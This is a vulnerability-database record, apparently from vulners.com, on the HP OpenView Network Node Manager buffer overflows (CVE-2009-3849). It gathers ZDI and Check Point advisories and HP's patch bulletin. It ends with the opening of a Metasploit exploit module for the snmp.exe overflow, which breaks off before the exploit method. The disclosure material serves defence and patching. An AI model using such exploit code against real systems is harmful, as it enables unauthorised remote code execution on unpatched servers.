-- TippingPoint(TM) IPS Customer Protection:
TippingPoint IPS customers have been protected against this
vulnerability by Digital Vaccine protection filter ID 8337.
For further product information on the TippingPoint IPS, visit:
http://www.tippingpoint.com
-- Vulnerability Details:
This vulnerability allows remote attackers to execute arbitrary code on
vulnerable installations of Hewlett-Packard OpenView Network Node
Manager. Authentication is not required to exploit this vulnerability.
The specific flaw exists within the nnmRptConfig.exe CGI executable
accessible via the IIS web server listening by default on TCP port 80.
While parsing POST variables this process copies the contents of the
Template parameter into a fixed length stack buffer using a strcat call.
By supplying a large enough value this buffer can be overflowed leading
to arbitrary code execution.
-- Vendor Response:
Hewlett-Packard has issued an update to correct this vulnerability. More
details can be found at:
-- Disclosure Timeline:
2009-07-14 - Vulnerability reported to vendor
2009-12-09 - Coordinated public release of advisory
-- Credit:
This vulnerability was discovered by:
* Anonymous
-- About the Zero Day Initiative (ZDI):
Established by TippingPoint, The Zero Day Initiative (ZDI) represents
a best-of-breed model for rewarding security researchers for responsibly
disclosing discovered vulnerabilities.
Researchers interested in getting paid for their security research
through the ZDI can find more information and sign-up at:
http://www.zerodayinitiative.com
The ZDI is unique in how the acquired vulnerability information is
used. TippingPoint does not re-sell the vulnerability details or any
exploit code. Instead, upon notifying the affected product vendor,
TippingPoint provides its customers with zero day protection through
its intrusion prevention technology. Explicit details regarding the
specifics of the vulnerability are not exposed to any parties until
an official vendor patch is publicly available. Furthermore, with the
altruistic aim of helping to secure a broader user base, TippingPoint
provides this vulnerability information confidentially to security
vendors (including competitors) who have a vulnerability protection or
mitigation product.
Our vulnerability disclosure policy is available online at:
{"id": "SECURITYVULNS:DOC:22904", "bulletinFamily": "software", "title": "ZDI-09-097: Hewlett-Packard OpenView NNM nnmRptConfig.exe Template Variable strcat Overflow Vulnerability", "description": "ZDI-09-097: Hewlett-Packard OpenView NNM nnmRptConfig.exe Template Variable strcat Overflow Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-09-097\r\nDecember 9, 2009\r\n\r\n-- CVE ID:\r\nCVE-2009-3849\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Network Node Manager\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 8337. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Hewlett-Packard OpenView Network Node\r\nManager. Authentication is not required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the nnmRptConfig.exe CGI executable\r\naccessible via the IIS web server listening by default on TCP port 80.\r\nWhile parsing POST variables this process copies the contents of the\r\nTemplate parameter into a fixed length stack buffer using a strcat call.\r\nBy supplying a large enough value this buffer can be overflowed leading\r\nto arbitrary code execution.\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01950877\r\n\r\n-- Disclosure Timeline:\r\n2009-07-14 - Vulnerability reported to vendor\r\n2009-12-09 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Anonymous\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/", "published": "2009-12-09T00:00:00", "modified": "2009-12-09T00:00:00", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}, "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22904", "reporter": "Securityvulns", "references": [], "cvelist": ["CVE-2009-3849"], "type": "securityvulns", "lastseen": "2018-08-31T11:10:32", "edition": 1, "viewCount": 2, "enchantments": {"score": {"value": 7.6, "vector": "NONE"}, "dependencies": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2009-461", "CPAI-2010-006"]}, {"type": "cve", "idList": ["CVE-2009-3849"]}, {"type": "d2", "idList": ["D2SEC_HPNNM3"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_SNMP"]}, {"type": "nessus", "idList": ["HPUX_PHSS_40374.NASL", "HPUX_PHSS_40375.NASL", "HPUX_PHSS_40705.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:84565"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22905", "SECURITYVULNS:DOC:22918", "SECURITYVULNS:VULN:10460"]}, {"type": "seebug", "idList": ["SSV:15058"]}, {"type": "zdi", "idList": ["ZDI-09-095", "ZDI-09-097"]}]}, "backreferences": {"references": [{"type": "checkpoint_advisories", "idList": ["CPAI-2010-006"]}, {"type": "cve", "idList": ["CVE-2009-3849"]}, {"type": "d2", "idList": ["D2SEC_HPNNM3"]}, {"type": "metasploit", "idList": ["MSF:EXPLOIT/WINDOWS/HTTP/HP_NNM_SNMP"]}, {"type": "nessus", "idList": ["HPUX_PHSS_40375.NASL"]}, {"type": "packetstorm", "idList": ["PACKETSTORM:84565"]}, {"type": "securityvulns", "idList": ["SECURITYVULNS:DOC:22918"]}, {"type": "zdi", "idList": ["ZDI-09-095", "ZDI-09-097"]}]}, "exploitation": null, "vulnersScore": 7.6}, "affectedSoftware": [], "immutableFields": [], "cvss2": {}, "cvss3": {}, "_state": {"dependencies": 1647552764}}
{"zdi": [{"lastseen": "2022-01-31T22:40:47", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard OpenView Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the nnmRptConfig.exe CGI executable accessible via the IIS web server listening by default on TCP port 80. While parsing POST variables this process copies the contents of the Template parameter into a fixed length stack buffer using a strcat call. By supplying a large enough value this buffer can be overflowed leading to arbitrary code execution.", "cvss3": {}, "published": "2009-12-09T00:00:00", "type": "zdi", "title": "Hewlett-Packard OpenView NNM nnmRptConfig.exe Template Variable strcat Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3849"], "modified": "2009-12-09T00:00:00", "id": "ZDI-09-097", "href": "https://www.zerodayinitiative.com/advisories/ZDI-09-097/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-01-31T22:40:48", "description": "This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Hewlett-Packard OpenView Network Node Manager. Authentication is not required to exploit this vulnerability. The specific flaw exists within the snmp.exe CGI executable accessible via the IIS web server listening by default on TCP port 80. While parsing POST variables this process copies the contents of the Oid parameter into a fixed length stack buffer using a sprintf() call. By supplying a large enough value this buffer can be overflowed leading to arbitrary code execution.", "cvss3": {}, "published": "2009-12-09T00:00:00", "type": "zdi", "title": "Hewlett-Packard OpenView NNM Snmp.exe Oid Variable Buffer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3849"], "modified": "2009-12-09T00:00:00", "id": "ZDI-09-095", "href": "https://www.zerodayinitiative.com/advisories/ZDI-09-095/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "d2": [{"lastseen": "2021-07-28T14:32:23", "description": "**Name**| d2sec_hpnnm3 \n---|--- \n**CVE**| CVE-2009-3849 \n**Exploit Pack**| [D2ExploitPack](<http://http://www.d2sec.com/products.htm>) \n**Description**| HP Network Node Manager 7.53 Snmp.exe Oid Variable Stack Overflow Vulnerability \n**Notes**| \n", "edition": 3, "cvss3": {}, "published": "2009-12-10T22:30:00", "title": "DSquare Exploit Pack: D2SEC_HPNNM3", "type": "d2", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3849"], "modified": "2009-12-10T22:30:00", "id": "D2SEC_HPNNM3", "href": "http://exploitlist.immunityinc.com/home/exploitpack/D2ExploitPack/d2sec_hpnnm3", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "checkpoint_advisories": [{"lastseen": "2021-12-17T12:34:43", "description": "HP OpenView product consists of a suite of network and system management software applications developed by HP. It includes several optional modules and components, such as OpenView Quality Manager, OpenView Performance Insight, OpenView Network Node Manager, etc. A buffer overflow vulnerability exists in HP OpenView Network Node Manager CGI program snmp.exe. The vulnerability is due to a boundary error while parsing HTTP requests containing an overly long Oid value. A remote unauthenticated attacker can exploit this vulnerability by sending a crafted HTTP request to a target server, potentially causing arbitrary code to be injected and executed in the security context of the Internet Guest account. In an attack scenario, where arbitrary code is injected and executed on the target machine, the behaviour of the target is dependent on the logic of the malicious code.", "cvss3": {}, "published": "2010-02-02T00:00:00", "type": "checkpoint_advisories", "title": "HP OpenView Network Node Manager snmp.exe Oid Variable Buffer Overflow (CVE-2009-3849)", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3849"], "modified": "2015-11-03T00:00:00", "id": "CPAI-2009-461", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-11-04T20:12:11", "description": "A buffer overflow vulnerability has been reported in HP OpenView Network Node Manager (NNM) CGI program snmp.exe. The NNM is an HP OpenView product which manages networks. It determines and displays physical and logical connectivity in networks, as well as information referring to protocols running over the network. A remote attacker could exploit this vulnerability to inject and execute arbitrary code on a target server.", "cvss3": {}, "published": "2010-01-06T00:00:00", "type": "checkpoint_advisories", "title": "Preemptive Protection against HP OpenView Network Node Manager snmp.exe Oid Variable Buffer Overflow Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2009-3849"], "modified": "2010-01-15T00:00:00", "id": "CPAI-2010-006", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:10:32", "description": "ZDI-09-095: Hewlett-Packard OpenView NNM Snmp.exe Oid Variable Buffer Overflow Vulnerability\r\nhttp://www.zerodayinitiative.com/advisories/ZDI-09-095\r\nDecember 9, 2009\r\n\r\n-- CVE ID:\r\nCVE-2009-3849\r\n\r\n-- Affected Vendors:\r\nHewlett-Packard\r\n\r\n-- Affected Products:\r\nHewlett-Packard OpenView Network Node Manager\r\n\r\n-- TippingPoint(TM) IPS Customer Protection:\r\nTippingPoint IPS customers have been protected against this\r\nvulnerability by Digital Vaccine protection filter ID 8331. \r\nFor further product information on the TippingPoint IPS, visit:\r\n\r\n http://www.tippingpoint.com\r\n\r\n-- Vulnerability Details:\r\nThis vulnerability allows remote attackers to execute arbitrary code on\r\nvulnerable installations of Hewlett-Packard OpenView Network Node\r\nManager. Authentication is not required to exploit this vulnerability.\r\n\r\nThe specific flaw exists within the snmp.exe CGI executable accessible\r\nvia the IIS web server listening by default on TCP port 80. While\r\nparsing POST variables this process copies the contents of the Oid\r\nparameter into a fixed length stack buffer using a sprintf() call. By\r\nsupplying a large enough value this buffer can be overflowed leading to\r\narbitrary code execution.\r\n\r\n-- Vendor Response:\r\nHewlett-Packard has issued an update to correct this vulnerability. More\r\ndetails can be found at:\r\n\r\nhttp://h20000.www2.hp.com/bizsupport/TechSupport/Document.jsp?objectID=c01950877\r\n\r\n-- Disclosure Timeline:\r\n2009-07-16 - Vulnerability reported to vendor\r\n2009-12-09 - Coordinated public release of advisory\r\n\r\n-- Credit:\r\nThis vulnerability was discovered by:\r\n * Anonymous\r\n\r\n-- About the Zero Day Initiative (ZDI):\r\nEstablished by TippingPoint, The Zero Day Initiative (ZDI) represents \r\na best-of-breed model for rewarding security researchers for responsibly\r\ndisclosing discovered vulnerabilities.\r\n\r\nResearchers interested in getting paid for their security research\r\nthrough the ZDI can find more information and sign-up at:\r\n\r\n http://www.zerodayinitiative.com\r\n\r\nThe ZDI is unique in how the acquired vulnerability information is\r\nused. TippingPoint does not re-sell the vulnerability details or any\r\nexploit code. Instead, upon notifying the affected product vendor,\r\nTippingPoint provides its customers with zero day protection through\r\nits intrusion prevention technology. Explicit details regarding the\r\nspecifics of the vulnerability are not exposed to any parties until\r\nan official vendor patch is publicly available. Furthermore, with the\r\naltruistic aim of helping to secure a broader user base, TippingPoint\r\nprovides this vulnerability information confidentially to security\r\nvendors (including competitors) who have a vulnerability protection or\r\nmitigation product.\r\n\r\nOur vulnerability disclosure policy is available online at:\r\n\r\n http://www.zerodayinitiative.com/advisories/disclosure_policy/", "edition": 1, "cvss3": {}, "published": "2009-12-09T00:00:00", "title": "ZDI-09-095: Hewlett-Packard OpenView NNM Snmp.exe Oid Variable Buffer Overflow Vulnerability", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2009-3849"], "modified": "2009-12-09T00:00:00", "id": "SECURITYVULNS:DOC:22905", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22905", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2021-06-08T19:08:16", "description": "Multiple vulnerabilities in different CGI applications.", "edition": 2, "cvss3": {}, "published": "2009-12-10T00:00:00", "title": "HP OpenView NNM multiple security vulnerabilities", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2009-3848", "CVE-2009-3846", "CVE-2009-4177", "CVE-2009-4180", "CVE-2009-3849", "CVE-2009-0898", "CVE-2009-4181", "CVE-2009-4176", "CVE-2009-4178", "CVE-2009-4179", "CVE-2009-3845"], "modified": "2009-12-10T00:00:00", "id": "SECURITYVULNS:VULN:10460", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:10460", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:32", "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\nSUPPORT COMMUNICATION - SECURITY BULLETIN\r\n\r\nDocument ID: c01950877\r\nVersion: 1\r\n\r\nHPSBMA02483 SSRT090257 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code\r\n\r\nNOTICE: The information in this Security Bulletin should be acted upon as soon as possible.\r\n\r\nRelease Date: 2009-12-09\r\nLast Updated: 2009-12-09\r\n\r\nPotential Security Impact: Remote execution of arbitrary code\r\n\r\nSource: Hewlett-Packard Company, HP Software Security Response Team\r\n\r\nVULNERABILITY SUMMARY\r\nPotential security vulnerabilities have been identified with HP OpenView Network Node Manager (OV NNM). These\r\nvulnerabilities could be exploited remotely to execute arbitrary code.\r\n\r\nReferences: CVE-2009-0898 (SSRT09101), CVE-2009-3845 (SSRT090037), CVE-2009-3846 (SSRT090122), CVE-2009-3849 (SSRT090128),\r\nCVE-2009-3848 (SSRT090129), CVE-2009-3849 (SSRT090130), CVE-2009-4176 (SSRT090131), CVE-2009-4177 (SSRT090132),\r\nCVE-2009-4178 (SSRT090133), CVE-2009-4179 (SSRT090134), CVE-2009-4180 (SSRT090135), CVE-2009-4181 (SSRT090164)\r\n\r\nSUPPORTED SOFTWARE VERSIONS*: ONLY impacted versions are listed.\r\nHP OpenView Network Node Manager (OV NNM) v7.01, v7.51, v7.53 running on HP-UX, Linux, Solaris, and Windows\r\n\r\nBACKGROUND\r\n\r\nCVSS 2.0 Base Metrics\r\n===========================================================\r\n Reference Base Vector Base Score\r\nCVE-2009-0898 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2009-3845 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2009-3846 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2009-3847 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2009-3848 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2009-3849 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2009-4176 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2009-4177 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2009-4178 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2009-4179 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2009-4180 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\nCVE-2009-4181 (AV:N/AC:L/Au:N/C:C/I:C/A:C) 10.0\r\n===========================================================\r\n Information on CVSS is documented\r\n in HP Customer Notice: HPSN-2008-002\r\n\r\nSSRT090101\r\n\r\nThe Hewlett-Packard Company thanks Takehiro Takahashi, IBM X-Force for reporting this vulnerability to\r\nsecurity-alert@hp.com.\r\n\r\nSSRT090037, SSRT090128, SSRT090129, SSRT090130\r\n\r\nThe Hewlett-Packard Company thanks an anonymous researcher working with the TippingPoint Zero Day Initiative for reporting\r\nthese vulnerabilities to security-alert@hp.com.\r\n\r\nSSRT090122, SSRT090131, SSRT090132, SSRT090133, SSRT090134, SSRT090135, SSRT090164\r\n\r\nThe Hewlett-Packard Company thanks Aaron Portnoy of TippingPoint DVLabs for reporting these vulnerabilities to\r\nsecurity-alert@hp.com.\r\n\r\nRESOLUTION\r\n\r\nHP has made patches available to resolve the vulnerabilities for NNM v7.53.\r\n\r\nThe patches are available from http://support.openview.hp.com/selfsolve/patches\r\n\r\nNote: The patches are not available from the HP IT Resource Center (ITRC).\r\n\r\nOV NNM v7.53\r\n\r\nOperating System\r\n Patch\r\n\r\nHP-UX (IA)\r\n PHSS_40375 or subsequent\r\n\r\nHP-UX (PA)\r\n PHSS_40374 or subsequent\r\n\r\nLinux RedHatAS2.1\r\n LXOV_00101 or subsequent\r\n\r\nLinux RedHat4AS-x86_64\r\n LXOV_00102 or subsequent\r\n\r\nSolaris\r\n PSOV_03525 or subsequent\r\n\r\nWindows\r\n NNM_01201 or subsequent\r\n\r\nOV NNM v7.51\r\nUpgrade to NNM v7.53 and apply the NNM v7.53 resolution listed above.\r\nPatch bundles for upgrading from NNM v7.51 to NNM v7.53 are available using ftp:\r\n\r\nHost\r\n Account\r\n Password\r\n\r\nftp.usa.hp.com\r\n nnm_753\r\n Update53\r\n\r\nOV NNM v7.01\r\nInstall the required patch. Then apply the archive file.\r\n\r\nThe patches are available from http://support.openview.hp.com/selfsolve/patches\r\n\r\nOperating_System\r\n Required_Patch\r\n Archive_File\r\n SHA-1 _Hash_for_Archive_File\r\n\r\nHP-UX (PA)\r\n PHSS_36773 or subsequent\r\n NNM701_IP12_hotfix_hpux.tar\r\n 33f2-e469-2b8e-7669-abba-9c7b-cab6-5e48-bb5e-1923\r\n\r\nSolaris\r\n PSOV_03480 or subsequent\r\n NNM701_IP12_hotfix_solaris.tar\r\n 6b14-1a8f-fbb9-936e-714e-3896-5da0-93c4-9609-7f78\r\n\r\nWindows\r\n NNM_01159 or subsequent\r\n NNM701_IP12_hotfix_windows.zip\r\n ecd7-acf2-3991-2c18-58df-a3f9-e4ef-e337-a019-88ae\r\n\r\nThe archive files are available using ftp:\r\n\r\nHost\r\n Account\r\n Password\r\n\r\nftp.usa.hp.com\r\n sb02483\r\n Secure12\r\n\r\nMANUAL ACTIONS: Yes\r\nNNM v7.51 - Upgrade to v7.53 and apply the appropriate patches.\r\nNNM v7.01 - Apply the appropriate archive.\r\n\r\nPRODUCT SPECIFIC INFORMATION\r\n\r\nHP-UX Software Assistant: HP-UX Software Assistant is an enhanced application that replaces HP-UX Security Patch Check. It\r\nanalyzes all Security Bulletins issued by HP and lists recommended actions that may apply to a specific HP-UX system. It can\r\nalso download patches and create a depot automatically. For more information see https://www.hp.com/go/swa\r\n\r\nThe following text is for use by the HP-UX Software Assistant.\r\n\r\nAFFECTED VERSIONS (for HP-UX)\r\n\r\nFor HP-UX OV NNM 7.51 and 7.53\r\nHP-UX B.11.31\r\nHP-UX B.11.23 (IA)\r\nHP-UX B.11.23 (PA)\r\nHP-UX B.11.11\r\n=============\r\nOVNNMgr.OVNNM-RUN,fr=B.07.50.00\r\naction: install the patches listed in the Resolution\r\n\r\nFor HP-UX OV NNM 7.01\r\nHP-UX B.11.11\r\n=============\r\nOVNNMgr.OVNNM-RUN,fr=B.07.01.00\r\naction: install the patches and archive files listed in the Resolution\r\n\r\nEND AFFECTED VERSIONS (for HP-UX)\r\n\r\nHISTORY\r\nVersion:1 (rev.1) - 9 December 2009 Initial release\r\n\r\nThird Party Security Patches: Third party security patches that are to be installed on systems running HP software products\r\nshould be applied in accordance with the customer's patch management policy.\r\n\r\nSupport: For further information, contact normal HP Services support channel.\r\n\r\nReport: To report a potential security vulnerability with any HP supported product, send Email to: security-alert@hp.com\r\nIt is strongly recommended that security related information being communicated to HP be encrypted using PGP, especially\r\nexploit information.\r\nTo get the security-alert PGP key, please send an e-mail message as follows:\r\n To: security-alert@hp.com\r\n Subject: get key\r\nSubscribe: To initiate a subscription to receive future HP Security Bulletins via Email:\r\nhttp://h30046.www3.hp.com/driverAlertProfile.php?regioncode=NA&langcode=USENG&jumpid=in_SC-GEN__driverITRC&topiccode=ITRC\r\nOn the web page: ITRC security bulletins and patch sign-up\r\nUnder Step1: your ITRC security bulletins and patches\r\n -check ALL categories for which alerts are required and continue.\r\nUnder Step2: your ITRC operating systems\r\n -verify your operating system selections are checked and save.\r\n\r\nTo update an existing subscription: http://h30046.www3.hp.com/subSignIn.php\r\nLog in on the web page: Subscriber's choice for Business: sign-in.\r\nOn the web page: Subscriber's Choice: your profile summary - use Edit Profile to update appropriate sections.\r\n\r\nTo review previously published Security Bulletins visit: http://www.itrc.hp.com/service/cki/secBullArchive.do\r\n\r\n* The Software Product Category that this Security Bulletin\r\nrelates to is represented by the 5th and 6th characters\r\nof the Bulletin number in the title:\r\n\r\nGN = HP General SW\r\nMA = HP Management Agents\r\nMI = Misc. 3rd Party SW\r\nMP = HP MPE/iX\r\nNS = HP NonStop Servers\r\nOV = HP OpenVMS\r\nPI = HP Printing & Imaging\r\nST = HP Storage SW\r\nTL = HP Trusted Linux\r\nTU = HP Tru64 UNIX\r\nUX = HP-UX\r\nVV = HP VirtualVault\r\n\r\nSystem management and security procedures must be reviewed frequently to maintain system integrity. HP is continually\r\nreviewing and enhancing the security features of software products to provide customers with current secure solutions.\r\n\r\n"HP is broadly distributing this Security Bulletin in order to bring to the attention of users of the affected HP products\r\nthe important security information contained in this Bulletin. HP recommends that all users determine the applicability of\r\nthis information to their individual situations and take appropriate action. HP does not warrant that this information is\r\nnecessarily accurate or complete for all user situations and, consequently, HP will not be responsible for any damages\r\nresulting from user's use or disregard of the information provided in this Bulletin. To the extent permitted by law, HP\r\ndisclaims all warranties, either express or implied, including the warranties of merchantability and fitness for a\r\nparticular purpose, title and non-infringement."\r\n\r\nCopyright 2009 Hewlett-Packard Development Company, L.P.\r\nHewlett-Packard Company shall not be liable for technical or editorial errors or omissions contained herein. The\r\ninformation provided is provided "as is" without warranty of any kind. To the extent permitted by law, neither HP or its\r\naffiliates, subcontractors or suppliers will be liable for incidental,special or consequential damages including downtime\r\ncost; lost profits;damages relating to the procurement of substitute products or services; or damages for loss of data, or\r\nsoftware restoration. The information in this document is subject to change without notice. Hewlett-Packard Company and the\r\nnames of Hewlett-Packard products referenced herein are trademarks of Hewlett-Packard Company in the United States and other\r\ncountries. Other product and company names mentioned herein may be trademarks of their respective owners.\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.4.10 (GNU/Linux)\r\n\r\niEYEARECAAYFAksfzW8ACgkQ4B86/C0qfVl0lgCg8l1qdOQodEoQImsuihKpfPhr\r\naCIAnjmuzeCDHGiOYDtodgWIzuYLWQJe\r\n=nhVc\r\n-----END PGP SIGNATURE-----", "edition": 1, "cvss3": {}, "published": "2009-12-10T00:00:00", "title": "[security bulletin] HPSBMA02483 SSRT090257 rev.1 - HP OpenView Network Node Manager (OV NNM), Remote Execution of Arbitrary Code", "type": "securityvulns", "bulletinFamily": "software", "cvss2": {}, "cvelist": ["CVE-2009-3848", "CVE-2009-3846", "CVE-2009-3847", "CVE-2009-4177", "CVE-2009-4180", "CVE-2009-3849", "CVE-2009-0898", "CVE-2009-4181", "CVE-2009-4176", "CVE-2009-4178", "CVE-2009-4179", "CVE-2009-3845"], "modified": "2009-12-10T00:00:00", "id": "SECURITYVULNS:DOC:22918", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:22918", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}], "packetstorm": [{"lastseen": "2016-12-05T22:16:51", "description": "", "cvss3": {}, "published": "2009-12-31T00:00:00", "type": "packetstorm", "title": "HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow", "bulletinFamily": "exploit", "cvss2": {}, "cvelist": ["CVE-2009-3849"], "modified": "2009-12-31T00:00:00", "id": "PACKETSTORM:84565", "href": "https://packetstormsecurity.com/files/84565/HP-OpenView-Network-Node-Manager-Snmp.exe-CGI-Buffer-Overflow.html", "sourceData": "`## \n# This file is part of the Metasploit Framework and may be subject to \n# redistribution and commercial restrictions. Please see the Metasploit \n# Framework web site for more information on licensing and terms of use. \n# http://metasploit.com/projects/Framework/ \n## \n \nrequire 'msf/core' \n \nclass Metasploit3 < Msf::Exploit::Remote \n \nRank = GreatRanking \n \ninclude Msf::Exploit::Remote::HttpClient \n \ndef initialize(info = {}) \nsuper(update_info(info, \n'Name' => 'HP OpenView Network Node Manager Snmp.exe CGI Buffer Overflow', \n'Description' => %q{ \nThis module exploits a stack overflow in HP OpenView Network Node Manager 7.50. \nBy sending a specially crafted CGI request to Snmp.exe, an attacker may be able to execute \narbitrary code. \n}, \n'Author' => [ 'MC' ], \n'License' => MSF_LICENSE, \n'Version' => '$Revision: 7869 $', \n'References' => \n[ \n[ 'CVE', '2009-3849' ], \n[ 'OSVDB', '60933' ], \n], \n'DefaultOptions' => \n{ \n'EXITFUNC' => 'process', \n}, \n'Privileged' => false, \n'Payload' => \n{ \n'Space' => 650, \n'BadChars' => \"\\x00\\x3a\\x26\\x3f\\x25\\x23\\x20\\x0a\\x0d\\x2f\\x2b\\x0b\\x5c\", \n'StackAdjustment' => -3500, \n}, \n'Platform' => 'win', \n'Targets' => \n[ 